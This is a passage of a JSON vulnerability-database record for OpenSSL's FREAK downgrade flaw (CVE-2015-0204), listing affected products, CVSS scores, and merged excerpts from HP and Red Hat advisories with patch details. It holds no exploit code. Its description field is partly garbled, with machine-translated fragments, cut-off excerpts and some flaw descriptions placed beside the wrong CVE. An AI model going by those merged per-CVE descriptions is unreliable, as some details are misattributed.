            "version": "9.0.13"
          },
          {
            "_id": null,
            "model": "open systems snapvault",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "thinpro linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "4.3"
          },
          {
            "_id": null,
            "model": "business process manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.12"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.0.1"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.3"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.2.1"
          },
          {
            "_id": null,
            "model": "rational developer for aix and cobol",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "buildforge",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0.1"
          },
          {
            "_id": null,
            "model": "system m2 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x350078390"
          },
          {
            "_id": null,
            "model": "jdk update22",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0"
          },
          {
            "_id": null,
            "model": "flashcopy manager for oracle",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1.0.0"
          },
          {
            "_id": null,
            "model": "telepresence server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "87104.1"
          },
          {
            "_id": null,
            "model": "jdk update15",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0"
          },
          {
            "_id": null,
            "model": "db2 workgroup server edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "flashcopy manager for oracle",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1.1.2"
          },
          {
            "_id": null,
            "model": "systems insight manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "flex system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.3.3.0"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.11"
          },
          {
            "_id": null,
            "model": "ios 15.5 s",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.0.2"
          },
          {
            "_id": null,
            "model": "prime performance manager for sps ppm sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "communication server 1000m",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.3"
          },
          {
            "_id": null,
            "model": "telepresence mx series",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "tivoli workload scheduler distributed fp04",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.1"
          },
          {
            "_id": null,
            "model": "insight orchestration",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "jre update4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0.40"
          },
          {
            "_id": null,
            "model": "rational doors next generation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.7"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v37007.1"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "1010.3.0.1418"
          },
          {
            "_id": null,
            "model": "communication server 1000m signaling server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v35007.2.0.8"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.33"
          },
          {
            "_id": null,
            "model": "flashcopy manager for custom applications",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2.0.0"
          },
          {
            "_id": null,
            "model": "upward integration modules for vmware vsphere",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.5.1"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.34"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70007.2.0.8"
          },
          {
            "_id": null,
            "model": "communication server 1000e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.4"
          },
          {
            "_id": null,
            "model": "version control agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.10.800"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.010"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.12"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#243585"
          },
          {
            "db": "BID",
            "id": "71936"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-001672"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0204"
          }
        ]
      },
      "configurations": {
        "_id": null,
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:nec:capssuite",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:nec:csview",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:nec:enterprise_directoryserver",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:nec:enterpriseidentitymanager",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:nec:express5800",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:nec:infocage",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:nec:ip38x_sr100",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:nec:istorage",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:nec:secureware_pki_application_development_kit",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:nec:webotx",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:nec:webotx_application_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:nec:webotx_enterprise_service_bus",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:nec:webotx_portal",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:nec:webotx_sip_application_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:nec:websam",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-001672"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "HP",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "131940"
          },
          {
            "db": "PACKETSTORM",
            "id": "133316"
          },
          {
            "db": "PACKETSTORM",
            "id": "130987"
          },
          {
            "db": "PACKETSTORM",
            "id": "131408"
          },
          {
            "db": "PACKETSTORM",
            "id": "132763"
          }
        ],
        "trust": 0.5
      },
      "cve": "CVE-2015-0204",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2015-0204",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.1,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "IPA",
                "availabilityImpact": "None",
                "baseScore": 7.8,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "JVNDB-2015-001672",
                "impactScore": null,
                "integrityImpact": "None",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2015-0204",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "IPA",
                "id": "JVNDB-2015-001672",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "VULMON",
                "id": "CVE-2015-0204",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2015-0204"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-001672"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0204"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate brute-force decryption by offering a weak ephemeral RSA key in a noncompliant role, related to the \"FREAK\" issue.  NOTE: the scope of this CVE is only client code based on OpenSSL, not EXPORT_RSA issues associated with servers or other TLS implementations. SSL/TLS Some implementations of export grade without intentional setting (512 Below bit ) of RSA Something accepts the key. Man-in-the-middle attacks against such software (man-in-the-middle attack) Is performed, the key used for encryption is decrypted, SSL/TLS The traffic content may be decrypted. this is\" FREAK It is also called \u201cattack\u201d. Algorithm downgrade (CWE-757) CWE-757: Selection of Less-Secure Algorithm During Negotiation (\u0027Algorithm Downgrade\u0027) https://cwe.mitre.org/data/definitions/757.html Incorrect cipher strength (CWE-326) CWE-326: Inadequate Encryption Strength https://cwe.mitre.org/data/definitions/326.html SSL/TLS Some implementations of export grade without intentional setting (512 Below bit ) of RSA Something accepts the key. If a man-in-the-middle attack is performed on such software, it is guided to use a weak key in the negotiation at the start of communication, and as a result, encrypted information may be decrypted. The discoverer has released detailed information about this matter. FREAK: Factoring RSA Export Keys https://www.smacktls.com/#freakMan-in-the-middle attacks (man-in-the-middle attack) By SSL/TLS The contents of the communication may be decrypted. OpenSSL is prone to security-bypass vulnerability. \nSuccessfully exploiting these issues may allow attackers to perform unauthorized actions by conducting a man-in-the-middle attack. This may lead to other attacks. Description:\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library. \n\nThis release serves as a replacement for Red Hat JBoss Web Server 2.1.0,\nand includes several bug fixes. Refer to the Red Hat JBoss Web Server 2.1.1\nRelease Notes, linked to in the References section, for information on the\nmost significant of these changes. \n\nSecurity Fix(es):\n\n* It was discovered that httpd used the value of the Proxy header from HTTP\nrequests to initialize the HTTP_PROXY environment variable for CGI scripts,\nwhich in turn was incorrectly used by certain HTTP client implementations\nto configure the proxy for outgoing HTTP requests. A remote attacker could\npossibly use this flaw to redirect HTTP requests performed by a CGI script\nto an attacker-controlled proxy via a malicious HTTP request. (CVE-2016-2106)\n\n* It was discovered that it is possible to remotely Segfault Apache http\nserver with a specially crafted string sent to the mod_cluster via service\nmessages (MCMP). Solution:\n\nBefore applying the update, back up your existing Red Hat JBoss Web Server\ninstallation (including all applications and configuration files). \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). \n\nRelease Date: 2015-05-19\nLast Updated: 2015-05-19\n\nPotential Security Impact: Remote Denial of Service (DoS) and other\nvulnerabilities\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP-UX running\nOpenSSL. These vulnerabilities could be exploited remotely to create a remote\nDenial of Service (DoS) and other vulnerabilities. \n\nReferences:\n\nCVE-2015-0204\nCVE-2015-0286\nCVE-2015-0287\nCVE-2015-0289\nCVE-2015-0292\nCVE-2015-0293\nCVE-2015-0209\nCVE-2015-0288\nSSRT102000\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP-UX B.11.11, B.11.23, B.11.31 running OpenSSL versions before v0.9.8zf\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n  Reference              Base Vector             Base Score\nCVE-2015-0204    (AV:N/AC:M/Au:N/C:N/I:P/A:N)       4.3\nCVE-2015-0286    (AV:N/AC:L/Au:N/C:N/I:N/A:P)       5.0\nCVE-2015-0287    (AV:N/AC:L/Au:N/C:N/I:N/A:P)       5.0\nCVE-2015-0289    (AV:N/AC:L/Au:N/C:N/I:N/A:P)       5.0\nCVE-2015-0292    (AV:N/AC:L/Au:N/C:P/I:P/A:P)       7.5\nCVE-2015-0293    (AV:N/AC:L/Au:N/C:N/I:N/A:P)       5.0\nCVE-2015-0209    (AV:N/AC:M/Au:N/C:P/I:P/A:P)       6.8\nCVE-2015-0288    (AV:N/AC:L/Au:N/C:N/I:N/A:P)       5.0\n===========================================================\n             Information on CVSS is documented\n            in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following updates to resolve these vulnerabilities. The\nupdates are available from the following URL:\n\nhttps://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber\n=OPENSSL11I\n\nHP-UX Release\n HP-UX OpenSSL depot name\n\nB.11.11 (11i v1)\n OpenSSL_A.00.09.08zf.001_HP-UX_B.11.11_32_64.depot\n\nB.11.23 (11i v2)\n OpenSSL_A.00.09.08zf.002_HP-UX_B.11.23_IA-PA.depot\n\nB.11.31 (11i v3)\n OpenSSL_A.00.09.08zf.003_HP-UX_B.11.31_IA-PA.depot\n\nMANUAL ACTIONS: Yes - Update\n\nInstall HP-UX OpenSSL A.00.09.08zf or subsequent\n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see: https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.11\n==================\nopenssl.OPENSSL-CER\nopenssl.OPENSSL-CONF\nopenssl.OPENSSL-DOC\nopenssl.OPENSSL-INC\nopenssl.OPENSSL-LIB\nopenssl.OPENSSL-MAN\nopenssl.OPENSSL-MIS\nopenssl.OPENSSL-PRNG\nopenssl.OPENSSL-PVT\nopenssl.OPENSSL-RUN\nopenssl.OPENSSL-SRC\naction: install revision A.00.09.08zf.001 or subsequent\n\nHP-UX B.11.23\n==================\nopenssl.OPENSSL-CER\nopenssl.OPENSSL-CONF\nopenssl.OPENSSL-DOC\nopenssl.OPENSSL-INC\nopenssl.OPENSSL-LIB\nopenssl.OPENSSL-MAN\nopenssl.OPENSSL-MIS\nopenssl.OPENSSL-PRNG\nopenssl.OPENSSL-PVT\nopenssl.OPENSSL-RUN\nopenssl.OPENSSL-SRC\naction: install revision A.00.09.08zf.002 or subsequent\n\nHP-UX B.11.31\n==================\nopenssl.OPENSSL-CER\nopenssl.OPENSSL-CONF\nopenssl.OPENSSL-DOC\nopenssl.OPENSSL-INC\nopenssl.OPENSSL-LIB\nopenssl.OPENSSL-MAN\nopenssl.OPENSSL-MIS\nopenssl.OPENSSL-PRNG\nopenssl.OPENSSL-PVT\nopenssl.OPENSSL-RUN\nopenssl.OPENSSL-SRC\naction: install revision A.00.09.08zf.003 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) - 20 May 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel.  For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\nHP ThinPro Linux (x86) v5.1\nHP ThinPro Linux (x86) v5.0\nHP ThinPro Linux (x86) v4.4\nHP ThinPro Linux (x86) v4.3\nHP ThinPro Linux (x86) v4.2\nHP ThinPro Linux (x86) v4.1\nHP ThinPro Linux (ARM) v4.4\nHP ThinPro Linux (ARM) v4.3\nHP ThinPro Linux (ARM) v4.2\nHP ThinPro Linux (ARM) v4.1\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n  Reference              Base Vector             Base Score\nCVE-2014-3569    (AV:N/AC:L/Au:N/C:N/I:N/A:P)        5.0\nCVE-2014-3570    (AV:N/AC:L/Au:N/C:P/I:N/A:N)        5.0\nCVE-2014-3571    (AV:N/AC:L/Au:N/C:N/I:N/A:P)        5.0\nCVE-2014-3572    (AV:N/AC:L/Au:N/C:N/I:P/A:N)        5.0\nCVE-2014-8275    (AV:N/AC:L/Au:N/C:N/I:P/A:N)        5.0\nCVE-2015-0204    (AV:N/AC:L/Au:N/C:N/I:P/A:N)        5.0\nCVE-2015-0205    (AV:N/AC:L/Au:N/C:N/I:P/A:N)        5.0\nCVE-2015-0206    (AV:N/AC:L/Au:N/C:N/I:N/A:P)        5.0\nCVE-2015-0235    (AV:N/AC:L/Au:N/C:C/I:C/A:C)       10.0\n===========================================================\n             Information on CVSS is documented\n            in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has released the following software updates to resolve the vulnerability\nfor HP ThinPro Linux. \n\nSoftpaq:\nhttp://ftp.hp.com/pub/softpaq/sp70501-71000/sp70649.exe\n\nEasy Update Via ThinPro / EasyUpdate (x86):\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-\n4.1-4.3-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-\n4.1-4.3-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-\n4.1-4.3-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.1-all-\n4.4-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/security-sp-2.1-all-\n5.0-5.1-x86.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/security-sp-2.1-all-\n5.0-5.1-x86.xar\n\nVia ThinPro / EasyUpdate (ARM):\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-\n4.1-4.3-armel.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-\n4.1-4.3-armel.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-\n4.1-4.3-armel.xar\n\nhttp://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.0-all-\n4.4-armel.xar\n\nNote: Known issue on security-sp-2.0-all-4.1-4.3-arm.xar: With the patch\napplied, VMware cannot connect if security level is set to \"Refuse insecure\nconnections\". Updating VMware to the latest package on ftp.hp.com will solve\nthe problem. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Moderate: openssl security update\nAdvisory ID:       RHSA-2015:0800-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2015-0800.html\nIssue date:        2015-04-13\nCVE Names:         CVE-2014-8275 CVE-2015-0204 CVE-2015-0287 \n                   CVE-2015-0288 CVE-2015-0289 CVE-2015-0292 \n                   CVE-2015-0293 \n=====================================================================\n\n1. Summary:\n\nUpdated openssl packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5\n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRHEL Desktop Workstation (v. 5 client) - i386, x86_64\nRed Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64\nRed Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library. (CVE-2015-0204)\n\nAn integer underflow flaw, leading to a buffer overflow, was found in the\nway OpenSSL decoded malformed Base64-encoded inputs. Note: this flaw is not exploitable via the TLS/SSL protocol because\nthe data being transferred is not Base64-encoded. (CVE-2015-0292)\n\nA denial of service flaw was found in the way OpenSSL handled SSLv2\nhandshake messages. A remote attacker could use this flaw to cause a\nTLS/SSL server using OpenSSL to exit on a failed assertion if it had both\nthe SSLv2 protocol and EXPORT-grade cipher suites enabled. \nAn attacker could use these flaws to modify an X.509 certificate to produce\na certificate with a different fingerprint without invalidating its\nsignature, and possibly bypass fingerprint-based blacklisting in\napplications. (CVE-2014-8275)\n\nAn out-of-bounds write flaw was found in the way OpenSSL reused certain\nASN.1 structures. (CVE-2015-0287)\n\nA NULL pointer dereference flaw was found in OpenSSL\u0027s X.509 certificate\nhandling implementation. A specially crafted X.509 certificate could cause\nan application using OpenSSL to crash if the application attempted to\nconvert the certificate to a certificate request. (CVE-2015-0288)\n\nA NULL pointer dereference was found in the way OpenSSL handled certain\nPKCS#7 inputs. TLS/SSL clients and servers using OpenSSL were not\naffected by this flaw. (CVE-2015-0289)\n\nRed Hat would like to thank the OpenSSL project for reporting \nCVE-2015-0287, CVE-2015-0288, CVE-2015-0289, CVE-2015-0292, and \nCVE-2015-0293. Upstream acknowledges Emilia K\u00e4sper of the OpenSSL \ndevelopment team as the original reporter of CVE-2015-0287, Brian Carpenter\nas the original reporter of CVE-2015-0288, Michal Zalewski of Google as the\noriginal reporter of CVE-2015-0289, Robert Dugal and David Ramos as the \noriginal reporters of CVE-2015-0292, and Sean Burford of Google and Emilia \nK\u00e4sper of the OpenSSL development team as the original reporters of \nCVE-2015-0293. \n\nAll openssl users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. For the update to take\neffect, all services linked to the OpenSSL library must be restarted, or\nthe system rebooted. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1180184 - CVE-2015-0204 openssl: only allow ephemeral RSA keys in export ciphersuites (FREAK)\n1180187 - CVE-2014-8275 openssl: Fix various certificate fingerprint issues\n1202380 - CVE-2015-0287 openssl: ASN.1 structure reuse memory corruption\n1202384 - CVE-2015-0289 openssl: PKCS7 NULL pointer dereference\n1202395 - CVE-2015-0292 openssl: integer underflow leading to buffer overflow in base64 decoding\n1202404 - CVE-2015-0293 openssl: assertion failure in SSLv2 servers\n1202418 - CVE-2015-0288 openssl: X509_to_X509_REQ NULL pointer dereference\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 5 client):\n\nSource:\nopenssl-0.9.8e-33.el5_11.src.rpm\n\ni386:\nopenssl-0.9.8e-33.el5_11.i386.rpm\nopenssl-0.9.8e-33.el5_11.i686.rpm\nopenssl-debuginfo-0.9.8e-33.el5_11.i386.rpm\nopenssl-debuginfo-0.9.8e-33.el5_11.i686.rpm\nopenssl-perl-0.9.8e-33.el5_11.i386.rpm\n\nx86_64:\nopenssl-0.9.8e-33.el5_11.i686.rpm\nopenssl-0.9.8e-33.el5_11.x86_64.rpm\nopenssl-debuginfo-0.9.8e-33.el5_11.i686.rpm\nopenssl-debuginfo-0.9.8e-33.el5_11.x86_64.rpm\nopenssl-perl-0.9.8e-33.el5_11.x86_64.rpm\n\nRHEL Desktop Workstation (v. 5 client):\n\nSource:\nopenssl-0.9.8e-33.el5_11.src.rpm\n\ni386:\nopenssl-debuginfo-0.9.8e-33.el5_11.i386.rpm\nopenssl-devel-0.9.8e-33.el5_11.i386.rpm\n\nx86_64:\nopenssl-debuginfo-0.9.8e-33.el5_11.i386.rpm\nopenssl-debuginfo-0.9.8e-33.el5_11.x86_64.rpm\nopenssl-devel-0.9.8e-33.el5_11.i386.rpm\nopenssl-devel-0.9.8e-33.el5_11.x86_64.rpm\n\nRed Hat Enterprise Linux (v. 5 server):\n\nSource:\nopenssl-0.9.8e-33.el5_11.src.rpm\n\ni386:\nopenssl-0.9.8e-33.el5_11.i386.rpm\nopenssl-0.9.8e-33.el5_11.i686.rpm\nopenssl-debuginfo-0.9.8e-33.el5_11.i386.rpm\nopenssl-debuginfo-0.9.8e-33.el5_11.i686.rpm\nopenssl-devel-0.9.8e-33.el5_11.i386.rpm\nopenssl-perl-0.9.8e-33.el5_11.i386.rpm\n\nia64:\nopenssl-0.9.8e-33.el5_11.i686.rpm\nopenssl-0.9.8e-33.el5_11.ia64.rpm\nopenssl-debuginfo-0.9.8e-33.el5_11.i686.rpm\nopenssl-debuginfo-0.9.8e-33.el5_11.ia64.rpm\nopenssl-devel-0.9.8e-33.el5_11.ia64.rpm\nopenssl-perl-0.9.8e-33.el5_11.ia64.rpm\n\nppc:\nopenssl-0.9.8e-33.el5_11.ppc.rpm\nopenssl-0.9.8e-33.el5_11.ppc64.rpm\nopenssl-debuginfo-0.9.8e-33.el5_11.ppc.rpm\nopenssl-debuginfo-0.9.8e-33.el5_11.ppc64.rpm\nopenssl-devel-0.9.8e-33.el5_11.ppc.rpm\nopenssl-devel-0.9.8e-33.el5_11.ppc64.rpm\nopenssl-perl-0.9.8e-33.el5_11.ppc.rpm\n\ns390x:\nopenssl-0.9.8e-33.el5_11.s390.rpm\nopenssl-0.9.8e-33.el5_11.s390x.rpm\nopenssl-debuginfo-0.9.8e-33.el5_11.s390.rpm\nopenssl-debuginfo-0.9.8e-33.el5_11.s390x.rpm\nopenssl-devel-0.9.8e-33.el5_11.s390.rpm\nopenssl-devel-0.9.8e-33.el5_11.s390x.rpm\nopenssl-perl-0.9.8e-33.el5_11.s390x.rpm\n\nx86_64:\nopenssl-0.9.8e-33.el5_11.i686.rpm\nopenssl-0.9.8e-33.el5_11.x86_64.rpm\nopenssl-debuginfo-0.9.8e-33.el5_11.i386.rpm\nopenssl-debuginfo-0.9.8e-33.el5_11.i686.rpm\nopenssl-debuginfo-0.9.8e-33.el5_11.x86_64.rpm\nopenssl-devel-0.9.8e-33.el5_11.i386.rpm\nopenssl-devel-0.9.8e-33.el5_11.x86_64.rpm\nopenssl-perl-0.9.8e-33.el5_11.x86_64.